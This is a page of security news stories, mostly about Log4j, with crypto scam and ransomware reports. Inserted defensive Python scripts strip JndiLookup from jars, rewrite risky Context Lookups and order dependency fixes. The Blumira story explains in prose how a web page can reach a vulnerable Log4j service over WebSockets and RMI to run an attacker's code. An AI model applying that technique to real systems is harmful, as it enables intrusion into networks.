More stories

  • Scammers grabbed $7.7 billion worth of cryptocurrency in 2021, say researchers

    Cryptocurrency-based scammers and cyber criminals netted a whopping $7.7 billion worth of cryptocurrency from victims in 2021, marking an 81% rise in losses compared to 2020, according to blockchain analysis firm Chainalysis. Some $1.1 billion of the $7.7 billion in losses were attributed to a single scheme which allegedly targeted Russia and Ukraine, it said.


    “As the largest form of cryptocurrency-based crime and one uniquely targeted toward new users, scamming poses one of the biggest threats to cryptocurrency’s continued adoption,” said Chainalysis.

    At the same time though, the number of deposits to scam addresses fell from just under 10.7 million to 4.1 million, which it said could mean there were fewer individual scam victims – but they are losing more.

    A major source of rising cryptocurrency losses in 2021 was so-called “rug pulls”, where the developers of a new cryptocurrency vanish and take supporters’ funds with them. Rug pulls accounted for 37% of all cryptocurrency scam revenue in 2021, totaling $2.8 billion – up from just 1% in 2020. “Rug pulls are prevalent in DeFi because with the right technical know-how, it’s cheap and easy to create new tokens on the Ethereum blockchain or others and get them listed on decentralized exchanges (DEXes) without a code audit,” it warned.

    The characteristics of the investment scam networks are changing. Chainalysis found that the number of active financial scams rose from 2,052 in 2020 to 3,300, while their individual lifespan has decreased from over 500 days in 2016 to 291 days in 2020 and just 70 days in 2021. “Previously, these scams may have been able to continue operating for longer. As scammers become aware of these actions, they may feel more pressure to close up shop before drawing the attention of regulators and law enforcement,” it said.

    Unsurprisingly, scams also increase in line with the rise in value of popular cryptocurrencies such as Ethereum and Bitcoin, although that link may have been broken in the last year.

    Chainalysis notes: “The most important takeaway is to avoid new tokens that haven’t undergone a code audit. Code audits are a process through which a third-party firm analyzes the code of the smart contract behind a new token or other DeFi project, and publicly confirms that the contract’s governance rules are iron clad and contain no mechanisms that would allow for the developers to make off with investors’ funds.”

    It added: “Investors may also want to be wary of tokens that lack the public-facing materials one would expect from a legitimate project, such as a website or white paper, as well as tokens created by individuals not using their real names.”

  • Services Australia rejects senator request for details of Cellebrite contract

    Image: A demonstration of Cellebrite technology being used (Getty Images).
    Services Australia has rejected a senator’s request to disclose its contract with Cellebrite, under which the company provides technology to help prevent criminal activity. Cellebrite, an Israeli digital intelligence company, is best known for its controversial phone-cracking technology, which it previously claimed could download most data from almost any device on behalf of government agencies.

    During Senate Estimates in October, Greens Senator Janet Rice had asked Services Australia various questions about the agency’s decision to procure vendor services from Cellebrite, among them a request to see a copy of the Cellebrite contract. Services Australia at the time took that request on notice.

    Rice had also asked about the scope of Services Australia’s usage of the Cellebrite technology, which Services Australia acting deputy CEO of payments and integrity Chris Birrer said has only been used in fraud and identity theft cases, such as when people have falsely claimed government disaster relief payments, uploaded false information to commit fraud, or stolen the identities of actual customers to hijack payments. Birrer added that his agency does not deploy these capabilities in relation to any general payment accuracy compliance activities.

    In its response to Rice’s request for the Cellebrite contract to be disclosed, Services Australia said disclosure of the requested documents would be contrary to the public interest, as it would prejudice its criminal intelligence and investigation functions and would not be consistent with the agency’s commercial interests.

    “Specifically, disclosure of the agency’s lawful methods or procedures for preventing, detecting, investigating, or dealing with matters arising out of breaches or evasions of the law would, or would be reasonably likely to, undermine the effectiveness of those methods or procedures,” Services Australia said in its response. “Disclosure would also reveal commercially sensitive information provided to the agency in confidence by Cellebrite, potentially causing the agency to be in breach of its contractual obligations, and commercially disadvantaging Cellebrite in the marketplace.”

    Social Services hires Deloitte to assess Cashless Debit Card efficacy

    As part of the responses to Senate Estimates questions taken on notice, Rice and Labor Senator Malarndirri McCarthy also received responses from the Department of Social Services about its progress in analysing the efficacy of the Cashless Debit Card (CDC) program. The CDC, which kicked off in 2016 as a trial, governs how some individuals in receipt of welfare spend their money; the idea behind the program is both to prevent the sale of alcohol, cigarettes, and some gift cards and to block the funds from being used on activities such as gambling. The program has repeatedly been labelled racist by the Opposition as it has disproportionately impacted Indigenous Australians. Labor Senators have also said there is no evidence that compulsory, broad-based income management actually works.

    In one of the responses, Social Services revealed most of its advertising of the CDC program in the Northern Territory, where most of the program trials have taken place, went to ads on 13 Indigenous radio stations, while only three regional and two national/metro radio stations received ads.

    To address concerns about the CDC’s efficacy, Social Services also revealed in responses to questions on notice that it has paid Deloitte AU$675,000 to undertake data repository services for the CDC program. This will entail analysing CDC data to provide a more complete evidence base of the program’s success and inform policy decisions for the future of the program. The department said the data to be considered relates to changes in social harm, along with a range of data on social security, drug and alcohol use, gambling, financial management, child protection, police records relating to drug and alcohol-related crime, domestic violence hospital admissions, employment and training, and education.

    The procurement of Deloitte’s services follows the Australian National Audit Office (ANAO) announcing last month that it would commence a follow-up audit into the effectiveness of the CDC program. The federal auditor is conducting another audit because Social Services did not have an adequate program for monitoring and evaluating the CDC program’s effectiveness, which meant it was difficult to conclude whether the program helped reduce social harm or whether the card was a lower-cost welfare quarantining approach. At the moment, CDC card providers like Indue are being paid AU$1,100 per participant in the program. In total, the federal government has paid AU$70 million to Indue since the program commenced.

  • Singapore holds emergency meetings with CII sectors over Log4j

    Singapore has held emergency meetings with critical information infrastructure (CII) sectors to prepare them for potential threats stemming from the Log4j vulnerability. The country’s cybersecurity agency has issued alerts on the Apache Java logging library flaw and is “closely monitoring” developments.

    The first alert had gone out on Dec 14, with Singapore’s Cyber Security Agency (CSA) warning that the “critical vulnerability”, when exploited successfully, could allow attackers to gain full control of affected servers. It noted that there was only a short window to deploy mitigation measures and organisations should do so quickly. It said alerts were sent out to CII sector leads and businesses, instructing them to immediately patch their systems to the latest version. The government agency was also working with these CII representatives to roll out mitigation measures.


    Singapore’s cybersecurity bill covers 11 critical information infrastructure (CII) sectors, enabling the relevant local authorities to take proactive measures to protect these CIIs. The bill outlines a regulatory framework that formalises the duties of CII providers in securing systems under their responsibility, both before and after a cybersecurity incident has occurred. These 11 “essential services” sectors include water, healthcare, energy, banking and finance, and aviation. No Log4j-related breaches had been reported at the time CSA issued its December 14 alert.

    CSA on Friday issued another update, raising the alert on the security flaw. It noted that because Log4j was widely used by software developers, the vulnerability could have “very serious consequences”.

    “The situation is evolving rapidly and there have already been numerous observations of ongoing attempts by threat actors to scan for and attack vulnerable systems,” the government agency said. “There have been two emergency meetings by CSA with all the CII sector leads to issue directions and technical details and heighten monitoring for unusual activities.”

    A briefing session was also held on Friday with trade associations and chambers to highlight the severity of the Log4j vulnerability and the urgency for all organisations, including small and midsize businesses (SMBs), to immediately deploy mitigation measures.

    In its advisory on dealing with the library flaw, Singapore CERT (SingCERT) cautioned that some previous stop-gap measures were no longer recommended as they had been determined to be insufficient. These included configuring the system property to true or modifying the logging configuration to disable message lookups. Users who were unable to upgrade to versions 2.16.0 or 2.12.2 (for Java 8 and Java 7, respectively) should disable lookups by removing the JndiLookup class from the log4j-core jar file, SingCERT advised.

    It added that users of products with Log4j should implement the latest patch, especially those using Apache Log4j with affected versions between 2.0 and 2.14.1. They should also beef up monitoring for unusual activities and review their system logs. Software developers that tapped Log4j in their products should identify and develop patches for affected products, as well as notify users of these products to prioritise the deployment of software updates.

    CSA said it was in contact with other international agencies and computer emergency response teams (CERTs) of ASEAN member states to share information on the latest developments on Log4j. It urged organisations affected by the vulnerability to report to SingCERT should they uncover evidence of any compromise.

    The US Cybersecurity and Infrastructure Security Agency on Friday also sent out an emergency directive, requiring federal civilian departments and agencies to immediately patch their internet-facing network assets for Apache Log4j vulnerabilities.
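SingCERT’s fallback for deployments that cannot upgrade is to remove the JndiLookup class from the log4j-core jar. The Python script below is an added example, not SingCERT’s or Apache’s tooling: it checks a jar for that class and rewrites the archive without it, keeping a .bak copy. The jar it builds for the demonstration is a constructed stand-in with dummy entries, not a real log4j-core.

```python
"""Strip org/apache/logging/log4j/core/lookup/JndiLookup.class from a
log4j-core jar (the SingCERT stop-gap for systems that cannot upgrade).
Added example; the sample jar built by make_sample_jar() is constructed."""
import io
import tempfile
import zipfile
from pathlib import Path

# Entry name of the class that performs JNDI lookups inside log4j-core.
JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"


def has_jndi_lookup(jar_path):
    """Return True if the jar still contains the JndiLookup class."""
    with zipfile.ZipFile(jar_path) as jar:
        return JNDI_LOOKUP in jar.namelist()


def strip_jndi_lookup(jar_path):
    """Rewrite the jar without JndiLookup.class; return True if it was removed.

    A zip entry cannot be deleted in place, so every other entry is copied
    into a new archive in memory, the original is saved as <name>.bak, and
    the new archive replaces it.
    """
    jar_path = Path(jar_path)
    with zipfile.ZipFile(jar_path) as src:
        if JNDI_LOOKUP not in src.namelist():
            return False  # nothing to do: already clean or not log4j-core
        buf = io.BytesIO()
        with zipfile.ZipFile(buf, "w") as dst:
            for info in src.infolist():
                if info.filename == JNDI_LOOKUP:
                    continue
                # Reusing the ZipInfo keeps timestamps/compression of each entry.
                dst.writestr(info, src.read(info.filename))
    backup = jar_path.with_name(jar_path.name + ".bak")
    backup.write_bytes(jar_path.read_bytes())
    jar_path.write_bytes(buf.getvalue())
    return True


def make_sample_jar(path):
    """Write a constructed stand-in for log4j-core with dummy class bytes."""
    magic = b"\xca\xfe\xba\xbe"  # Java class-file magic, body omitted
    with zipfile.ZipFile(path, "w", zipfile.ZIP_DEFLATED) as jar:
        jar.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        jar.writestr("org/apache/logging/log4j/core/Logger.class", magic)
        jar.writestr(JNDI_LOOKUP, magic)
        jar.writestr("org/apache/logging/log4j/core/lookup/DateLookup.class", magic)


def demo(workdir=None):
    """Build a sample jar, strip it, and report what happened.

    Returns (had_class_before, removed, has_class_after, removed_again,
             backup_exists, remaining_entries).
    """
    if workdir is None:
        workdir = tempfile.mkdtemp()
    jar = Path(workdir) / "log4j-core-2.14.1.jar"  # constructed file name
    make_sample_jar(jar)
    before = has_jndi_lookup(jar)
    removed = strip_jndi_lookup(jar)
    after = has_jndi_lookup(jar)
    removed_again = strip_jndi_lookup(jar)  # second pass: already clean
    backup_exists = jar.with_name(jar.name + ".bak").exists()
    with zipfile.ZipFile(jar) as z:
        entries = sorted(z.namelist())
    return before, removed, after, removed_again, backup_exists, entries


if __name__ == "__main__":
    print(demo())
```

Run it against a real log4j-core jar by calling strip_jndi_lookup() with that path; the class is only a stop-gap target, and the page’s advice to upgrade still stands.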

  • Apache releases new 2.17.0 patch for Log4j to solve denial of service vulnerability

    Apache has released version 2.17.0 of the patch for Log4j after discovering issues with its previous release, which came out on Tuesday. Apache said version 2.16 “does not always protect from infinite recursion in lookup evaluation” and explained that it is vulnerable to CVE-2021-45105, a denial of service vulnerability. Apache rated the severity “high” and gave it a CVSS score of 7.5.

    “Apache Log4j2 versions 2.0-alpha1 through 2.16.0 did not protect from uncontrolled recursion from self-referential lookups. When the logging configuration uses a non-default Pattern Layout with a Context Lookup (for example, $${ctx:loginId}), attackers with control over Thread Context Map (MDC) input data can craft malicious input data that contains a recursive lookup, resulting in a StackOverflowError that will terminate the process. This is also known as a DOS (Denial of Service) attack,” Apache explained. It added that the latest issue was discovered by Akamai Technologies’ Hideki Okamoto and an anonymous vulnerability researcher.

    Mitigations include applying the 2.17.0 patch and replacing Context Lookups like ${ctx:loginId} or $${ctx:loginId} with Thread Context Map patterns (%X, %mdc, or %MDC) in PatternLayout in the logging configuration. Apache also suggested removing references to Context Lookups in the configuration like ${ctx:loginId} or $${ctx:loginId} where they originate from sources external to the application, such as HTTP headers or user input. It noted that only the log4j-core JAR file is impacted by CVE-2021-45105.

    On Friday, security researchers online began tweeting about potential issues with 2.16.0, with some identifying the denial of service vulnerability.
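Apache’s configuration-side mitigation for CVE-2021-45105 is to replace Context Lookups in PatternLayout with Thread Context Map patterns. The script below is an added example rather than Apache’s code: it scans a log4j2.xml for ${ctx:...} and $${ctx:...} inside PatternLayout patterns and rewrites them to %X{...}. The configuration it contains is constructed for the demonstration, with one appender using the risky lookup form and one already using %X/%mdc.

```python
"""Find Context Lookups in log4j2.xml PatternLayout patterns and rewrite them
to Thread Context Map patterns (%X{key}), the CVE-2021-45105 mitigation Apache
lists beside upgrading to 2.17.0. Added example; SAMPLE_CONFIG is constructed."""
import re
import xml.etree.ElementTree as ET

# Matches ${ctx:loginId} and the double-dollar form $${ctx:loginId}.
CTX_LOOKUP = re.compile(r"\$?\$\{ctx:([A-Za-z0-9_.-]+)\}")

# Constructed sample: the Console appender uses Context Lookups (risky); the
# Audit appender already reads the Thread Context Map directly (safe).
SAMPLE_CONFIG = """<Configuration status="WARN">
  <Appenders>
    <Console name="Console" target="SYSTEM_OUT">
      <PatternLayout pattern="%d{HH:mm:ss} [%t] $${ctx:loginId} ${ctx:requestId} %-5level %c - %msg%n"/>
    </Console>
    <File name="Audit" fileName="audit.log">
      <PatternLayout pattern="%d %X{loginId} %mdc{requestId} %m%n"/>
    </File>
  </Appenders>
  <Loggers>
    <Root level="info"><AppenderRef ref="Console"/><AppenderRef ref="Audit"/></Root>
  </Loggers>
</Configuration>
"""


def find_context_lookups(xml_text):
    """Return [(appender_name, lookup_text, key)] for every Context Lookup
    found in a PatternLayout pattern attribute, in document order."""
    root = ET.fromstring(xml_text)
    hits = []
    for element in root.iter():
        for layout in element.findall("PatternLayout"):
            pattern = layout.get("pattern", "")
            for m in CTX_LOOKUP.finditer(pattern):
                hits.append((element.get("name"), m.group(0), m.group(1)))
    return hits


def rewrite_pattern(pattern):
    """Replace each ${ctx:key} / $${ctx:key} with %X{key}. The %X converter
    reads the Thread Context Map value as plain text instead of evaluating
    it as a lookup, so a self-referential value cannot recurse."""
    return CTX_LOOKUP.sub(lambda m: "%X{" + m.group(1) + "}", pattern)


def harden_config(xml_text):
    """Return the configuration with every PatternLayout pattern rewritten."""
    root = ET.fromstring(xml_text)
    for layout in root.iter("PatternLayout"):
        pattern = layout.get("pattern")
        if pattern:
            layout.set("pattern", rewrite_pattern(pattern))
    return ET.tostring(root, encoding="unicode")


if __name__ == "__main__":
    for appender, lookup, key in find_context_lookups(SAMPLE_CONFIG):
        print(f"appender {appender}: {lookup} -> %X{{{key}}}")
    print(harden_config(SAMPLE_CONFIG))
```

Rewriting the pattern removes the recursion trigger in the layout but is not a substitute for moving to 2.17.0, which is the first mitigation Apache lists.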

    Discussion about Log4j has dominated conversation all week. CISA released multiple advisories mandating that federal civilian agencies in the US apply patches before Christmas, while several major tech companies like IBM, Cisco and VMware have raced to address Log4j vulnerabilities in their products. Security company Blumira claims to have found a new Log4j attack vector that can be exploited through the path of a listening server on a machine or local network, potentially putting an end to the assumption that the problem was limited to exposed vulnerable servers. Other cybersecurity firms have found that major ransomware groups like Conti are exploring ways to take advantage of the vulnerability.

    Google released a security report on Friday in which Open Source Insights Team members James Wetter and Nicky Ringland said they found that 35,863 of the available Java artifacts from Maven Central depend on the affected Log4j code. This means that more than 8% of all packages on Maven Central have at least one version that is impacted by this vulnerability, the two explained. “The average ecosystem impact of advisories affecting Maven Central is 2%, with the median less than 0.1%,” Wetter and Ringland said. So far, nearly 5,000 artifacts have been patched, leaving more than 30,000 still affected. But the two noted that it will be difficult to address the issue because of how deeply Log4j is embedded in some products.

    “Most artifacts that depend on log4j do so indirectly. The deeper the vulnerability is in a dependency chain, the more steps are required for it to be fixed. For greater than 80% of the packages, the vulnerability is more than one level deep, with a majority affected five levels down (and some as many as nine levels down),” Wetter and Ringland wrote. “These packages will require fixes throughout all parts of the tree, starting from the deepest dependencies first.”

    The two went on to say that after looking at all publicly disclosed critical advisories affecting Maven packages, they found less than half (48%) of the artifacts affected by a vulnerability have been fixed, meaning it may take years for the Log4j issue to be solved.
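To show what “more than one level deep” and “starting from the deepest dependencies first” mean in practice, here is an added example (not Google’s Open Source Insights code) that walks a small constructed dependency graph, reports how many hops below each artifact log4j-core sits, and derives a release order in which every artifact ships only after the affected artifacts it depends on. Every artifact name other than log4j-core is made up.

```python
"""Depth of a vulnerable artifact in dependency trees and the resulting fix
order, illustrating the Maven Central analysis discussed above.
Added example on a constructed graph; artifact names are invented."""
from collections import deque

VULNERABLE = "log4j-core"

# Constructed direct-dependency graph: artifact -> direct dependencies.
SAMPLE_DEPS = {
    "web-app": ["http-lib", "json-lib"],
    "http-lib": ["net-core"],
    "net-core": ["logging-facade"],
    "logging-facade": [VULNERABLE],
    "json-lib": [],
    "batch-tool": [VULNERABLE],
    "report-svc": ["web-app", "batch-tool"],
    VULNERABLE: [],
}


def vulnerable_depth(deps, artifact, target=VULNERABLE):
    """Fewest dependency hops from artifact down to target, or None if the
    artifact does not depend on it. Depth 1 is a direct dependency; anything
    larger is transitive (what the report calls 'more than one level deep')."""
    seen = {artifact}
    queue = deque([(artifact, 0)])
    while queue:
        node, depth = queue.popleft()
        for child in deps.get(node, []):
            if child == target:
                return depth + 1
            if child not in seen:
                seen.add(child)
                queue.append((child, depth + 1))
    return None


def affected_artifacts(deps, target=VULNERABLE):
    """Map every artifact (other than target) that reaches target to its depth."""
    out = {}
    for artifact in deps:
        if artifact == target:
            continue
        depth = vulnerable_depth(deps, artifact, target)
        if depth is not None:
            out[artifact] = depth
    return out


def share_transitive(deps, target=VULNERABLE):
    """Fraction of affected artifacts whose exposure is only transitive."""
    affected = affected_artifacts(deps, target)
    if not affected:
        return 0.0
    return sum(1 for d in affected.values() if d > 1) / len(affected)


def fix_order(deps, target=VULNERABLE):
    """Release order for the affected artifacts: each appears only after every
    affected artifact it depends on, so fixes propagate from the deepest
    dependencies upward. Post-order DFS over the affected sub-graph; the
    'done' set also guards against cycles."""
    affected = affected_artifacts(deps, target)
    order, done = [], set()

    def visit(node):
        if node in done:
            return
        done.add(node)
        for child in deps.get(node, []):
            if child in affected:
                visit(child)
        order.append(node)

    for artifact in sorted(affected):
        visit(artifact)
    return order


if __name__ == "__main__":
    for name, depth in sorted(affected_artifacts(SAMPLE_DEPS).items()):
        print(f"{name}: {VULNERABLE} is {depth} level(s) deep")
    print("transitive share:", round(share_transitive(SAMPLE_DEPS), 2))
    print("fix order:", " -> ".join(fix_order(SAMPLE_DEPS)))
```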

  • Best cybersecurity schools and programs

    Are you a career-focused professional searching for the best cybersecurity programs? Discover several of the top colleges and universities with affordable tuition and impressive academic reputations. Consider college and program-specific grants, scholarships, and work-study jobs as well as education awards and other financial aid resources. When selecting the best programs, research each school’s accreditation, recruitment and enrollment efforts, and full-time and part-time graduation and retention rates, along with online degree options.

    Best cybersecurity schools and programs

    The data for this list was collected from the Integrated Postsecondary Education Data System and College Scorecard datasets. While several schools achieved high rankings, the following list draws from a subset of top-rated, regionally accredited schools and historically Black colleges and universities. Rankings were based on many factors such as computer science scholarships, online cybersecurity degree options, and affordable tuition and fees. Several top-rated colleges and universities have been listed. The data is accurate as of time of publication. Prior to enrollment, prospective students are encouraged to check the schools’ websites and terms and conditions.

    1. Bentley University

    Bentley University’s cybersecurity risk management certificate offers students and working professionals experience in information security. Prospective students can earn a CompTIA, ISACA, Cloud Security Alliance, or (ISC)2 certification. Students pay $9,900 for the certificate program and prepare for certification exams. The university ranks first for career services and promotes diversity-related initiatives.

    2. Bowie State University

    Bowie State University offers a graduate certificate, bachelor’s, and advanced computer science degrees with a cybersecurity specialization. Students may earn a computer technology bachelor’s degree in alpha and beta testing, cloud computing, and other related specializations. The university is recognized as a National Center of Academic Excellence in Cyber Defense Education and a top five institution for African American technology graduates.

    3. Butler University

    Butler University offers students and working professionals a four-module cyber risk management certificate. This self-paced program is $1,995 and may be completed in 3 to 10 hours. Students will gain program-specific experience in understanding pure risk and cyber risk, identifying third party errors and omissions, and interpreting cyber risk insurance policies along with other relevant industry skills.

    4. Carroll College

    Carroll College offers a free, online three-stage cyber fast track program in cybersecurity in which students gain in-depth, foundational knowledge of cybersecurity. Once mastered, students proceed with master forensics, intrusion detection, and security operations along with system and network penetration testing and application testing. The college awards three Women in Cybersecurity Scholarships to undergraduate and graduate students.

    5. Champlain College Online

    Champlain College offers students an online cybersecurity bachelor’s degree. The program is 120 credit hours and entirely online. Students commit 10 to 17 hours of course study. The university is recognized as a National Center of Academic Excellence in Cyber Defense Education. The college has ranked among the most affordable online cybersecurity bachelor’s degrees.

    6. Howard University

    Howard University offers a 15 credit hour cybersecurity graduate certificate. This program includes both computer science and engineering coursework. Students complete a year-long cybersecurity course, two technical courses, and a capstone project. Students may select database systems and security, wireless network security, or advanced operating systems and security to satisfy technical courses.

    7. Kennesaw State University

    Kennesaw State University offers an online cybersecurity bachelor’s and master’s degree. The 30-credit cybersecurity master’s program can be completed within a year. This program is suitable for both career changers and working professionals seeking career advancement. In 2019, the university ranked in the top 50 and 60 for business and information technology and engineering.

    8. North Carolina A&T State University

    North Carolina A&T offers an online, 12-credit hour post-baccalaureate cybersecurity certificate. Prospective students are required to take information privacy and security or advanced security applications along with a computer system security or network security course. For technical courses, students may choose from software security testing, principles of computer networking, and related computer science and technology courses.

    9. University of Illinois at Urbana-Champaign

    The University of Illinois at Urbana-Champaign offers a three course certificate in cybersecurity. Prospective students may compete in an approved cybersecurity competition, serve as an undergraduate researcher, or participate in the Illinois Cyber Security Scholars Program to meet the extracurricular requirement. While completing the certificate program, students attend an Information Trust Institute certificate program meeting.

    10. Virginia Tech

    Virginia Tech offers an online, 12-week cyber bootcamp. Prospective students may enroll in the computer engineering bachelor’s program with a cyber operations track, cybersecurity management and analytics business degree, or computer engineering major in networks and cybersecurity program. The university offers a Cybercorps Scholarship for Service and master’s programs with cybersecurity tracks.

  • Log4j: Conti ransomware attacking VMware servers and TellYouThePass ransomware hits China

    Researchers with security firm Advanced Intelligence (AdvIntel) have discovered the Conti ransomware group exploiting VMware vCenter Server instances through the Log4j vulnerabilities. In a report on Friday, the security company said it discovered multiple members of Conti discussing ways to take advantage of the Log4j issue, making them the first sophisticated ransomware group spotted trying to weaponize the vulnerability.

    AdvIntel said the current exploitation “led to multiple use cases through which the Conti group tested the possibilities of utilizing the Log4J2 exploit.” “Most importantly, AdvIntel confirmed that the criminals pursued targeting specific vulnerable Log4J2 VMware vCenter for lateral movement directly from the compromised network resulting in vCenter access affecting US and European victim networks from the pre-existent Cobalt Strike sessions,” the researchers said. They noted that their research of ransomware logs shows Conti made over $150 million in the last six months.

    AdvIntel laid out a timeline of Conti’s interest in Log4j, starting on November 1, when the group sought to find new attack vectors. Throughout November, Conti redesigned its infrastructure as it sought to expand, and by December 12 it had identified Log4Shell as a possibility. By December 15, it had begun actively targeting vCenter networks for lateral movement.

    In a statement, VMware said it issued a security advisory containing fixes for the 40 products it sells that are vulnerable to the Log4j issue, including vCenter. The advisory confirms that exploitation attempts have been observed in the wild.

    “Any service connected to the internet and not yet patched for the Log4j vulnerability (CVE-2021-44228) is vulnerable to hackers, and VMware strongly recommends immediate patching for Log4j,” VMware said.

    AdvIntel added that it is only a matter of time until Conti and other groups begin exploiting Log4j to its full capacity. Khonsari was the first ransomware group to begin targeting Log4j but was considered lower grade and did not even have a viable ransom note, leading some to consider it simply a wiper. Researchers in China have identified the TellYouThePass ransomware being used in attacks against Windows and Linux devices via the Log4j issue.

    Recorded Future ransomware expert Allan Liska said the most recent news about different ransomware groups exploring exploitation of Log4j lined up with what he is seeing. “IABs working with Conti have started scanning for Log4Shell and likely have exploited victims. BUT we have not seen any evidence of a successful ransomware attack resulting from these scans yet. Doesn’t mean it hasn’t happened, just we haven’t seen it,” Liska said.

  • Ransomware affects the entire retail supply chain this holiday season

    US online holiday sales grew by 30% in 2020, and Forrester forecasts that they will grow another 10% year over year in 2021. This growth raises the stakes for retail professionals to support the increased demand, which ultimately makes them a prime target for ransomware attackers.

    Why should retailers pay attention to ransomware preparedness?

    Ransomware attackers target organizations that need as close to 100% uptime as possible, since those businesses will feel the effects of a ransomware attack more viscerally and are more likely to pay a ransom quickly. Retailers and their providers fall right into this bucket: They rely on continuously running production, they must serve consumers constantly, and they often utilize just-in-time manufacturing. Furthermore, they often have several third-party dependencies they can’t disappoint and complex supply chains to manage. Every aspect of the retail supply chain is a potential target of attack. Since the holiday season guarantees retailers an increase in traffic and more emotionally charged purchases, the incentive for ransomware groups to attack them is greater now than ever. Below, we provide a primer on ransomware attacks and how they can affect retailers.

    What is ransomware?

    Ransomware is a type of malicious software designed to block access to a computer system until a sum of money is paid. It’s been used in very public attacks, like the one on Colonial Pipeline earlier this year, and attacks on hospital systems. This type of attack has become more common in part because of the emergence of ransomware-as-a-service (RaaS). RaaS is where attackers sell access to ransomware software as though they were operating a business, fully outfitted with salespeople, developers, managers, and marketers. They operate as a typical startup and sell access to their “product” on the dark web to cybercriminals who do not want to develop their own ransomware but still want to use it and get the payout.

    How does ransomware affect retailers?

    Ransomware attacks affect every aspect of the retail supply chain, especially in these five areas: suppliers, logistics, operations, products, and websites. Below are descriptions of how ransomware can affect each of these, with real-world examples.

    Suppliers

    When ransomware attackers target suppliers, it often results in machines in factories being disabled or employees being locked out of critical supply systems. Once most suppliers discover a ransomware attack, the de facto response to contain the attack is to shut down facility operations indefinitely. This results in production bottlenecks, and customers scramble to use their alternative supplier. This kind of attack struck JBS Foods this year, shutting down its slaughterhouse for an entire day. To add insult to injury, JBS had to shell out $11 million in Bitcoin ransom to get its systems back. To gauge the resilience of your suppliers in a crisis, we recommend using The Forrester Supplier Resilience Assessment Tool.

    Logistics

    Logistics firms are targeted by ransomware groups because of their just-in-time business models and the complex interconnectedness of their IT systems. Ransomware attacks on these targets quickly infect computer systems throughout the network to encrypt as many devices as possible and render the firm inoperable. This happened over the past few years with CMA CGM, FedEx, and Maersk, which all halted operations and suffered millions in revenue loss.

    Operations

    When ransomware infiltrates a brick-and-mortar store, it tries to infect point-of-sale systems, employee tools, store printers — whatever it can get its hands on. These attacks can prevent customer transactions or even force stores to close. More detrimental for the brand is the risk that your customers will witness an attack unravel your operations in real time. For example, Cencosud was made aware of a ransomware attack hitting its systems when POS printers spewed out ransom notes in its stores.

    Products

    Digital products such as e-readers, tablets, video gaming systems, and others are also susceptible to ransomware attacks. When hit, these devices may appear inoperable while the attacker steals company and customer data. This situation can be very detrimental for customers and organizations. When devices mysteriously stop working, customers often take to social media to air their grievances. This inevitably affects the external image of the brand and public perception of your product’s efficacy. When Barnes & Noble’s NOOK e-reader was attacked with ransomware, customers lost access to their libraries, purchases, and accounts — and complained on Facebook and Twitter as a result.

    Websites

    Ransomware attackers often look to target public assets — especially ones retailers rely on, like e-commerce websites. If your website shuts down from a ransomware attack, customers lose access to you, which may confuse or frustrate them and leave them concerned about the safety of their data. Last year, X-Cart’s e-commerce hosting site was corrupted, locking store owners out of their own websites and preventing customers from accessing them for days.

    How can you protect against ransomware attacks this holiday season?

    Protecting against ransomware attacks is something every single employee can participate in. Both during the holiday season and as you plan for your 2022 operations, the top three things we recommend to promote ransomware defenses among your employees are:

    1. Keep your team informed about the implications of a ransomware attack, especially around high-traffic times like the holidays. Make sure they know what ransomware is and are on the lookout for any signs of a potential ransomware attack.
    2. Get your employees to gamify finding phishing attacks and reporting them to your security team. Phishing attacks are one of the main ways cybercriminals start their attacks, so the more awareness you can spread about this attack vector, the better.
    3. Work with the security team to simulate what you would do in the event of a ransomware attack. Having a plan in place for how to respond when a ransomware attack happens is critical to having a quick and complete recovery.

    This blog post is part of Forrester’s holiday 2021 series. It was written by Forrester Analyst Allie Mellen and originally appeared on Forrester’s site.

  • Security firm Blumira discovers major new Log4j attack vector

    It doesn’t rain, but it pours. Previously, one assumption about the Log4j security vulnerability, rated 10 out of 10 in severity, was that it was limited to exposed vulnerable servers. We were wrong. The security company Blumira claims to have found a new, exciting Log4j attack vector.


    You didn’t really want to take this weekend off, did you? Of course not! Instead, you’ll be chasing down vulnerable Log4j code ever deeper into your network. According to Blumira, this newly discovered JavaScript WebSocket attack vector can be exploited through the path of a listening server on the victim’s machine or local network. A user simply has to navigate to a website for the attacker to trigger the vulnerability. Adding insult to injury, WebSocket connections within the host can be difficult to gain deep visibility into. That means it’s even harder to detect this vulnerability and attacks using it.

    This vector significantly expands the attack surface. How much so? It can be used on services running as localhost, which are not exposed to a network. This is what we like to call a “Shoot me now” kind of problem. Oh, and did I mention? The client itself has no direct control over WebSocket connections. They can silently start when a webpage loads. Don’t you love the word “silently” in this context? I know I do.

    WebSockets, for those of you who aren’t web developers, are supported in almost all modern web browsers. They’re commonly used for two-way communication functions such as website chat and alerts. They’re great at passing timely information back to the browser and allowing the browser to quickly send data back and forth. However, WebSockets have their own security risks. WebSockets aren’t restricted by same-origin policies like a normal cross-domain HTTP request. Instead, they expect the webserver to validate a request’s origin. In short, they don’t come with much in the way of built-in security measures.

    As you’d guess from this, WebSockets have been used in attacks before. WebSockets have been used to attack cable modems by sending malicious requests. They have also been used by hackers for host fingerprinting and port scanning.

In their proof-of-concept attack, Blumira found that by using one of the many Java Naming and Directory Interface (JNDI) exploits, they could trigger the vulnerability via a file path URL over a WebSocket connection to machines with a vulnerable Log4j2 library installed. All that was needed to trigger success was a path request that started on the web page load. Simple, but deadly.

Making matters worse, it doesn’t need to be localhost. WebSockets allow for connections to any IP. Let me repeat, “any IP”, and that includes private IP space.

Next, as the page loads, it will initiate a local WebSocket connection, hit the vulnerable listening server, and connect out over the identified type of connection based on the JNDI connection string. The researchers saw the most success utilizing Java Remote Method Invocation (RMI), default port 1099, although custom ports are often seen in use. Simply port scanning, a technique already in the WebSocket hacker handbook, was the easiest path to a successful attack. Making detecting such attacks even harder, the company found “specific patterns should not be expected as it is easy to trigger traffic passively in the background.”

Then, once an open port to a local service or a service accessible to the host is found, the attacker can drop the JNDI exploit string in the path or parameters. “When this happens, the vulnerable host calls out to the exploit server, loads the attacker’s class, and executes it with java.exe as the parent process.” Then the attacker can run whatever he wants.

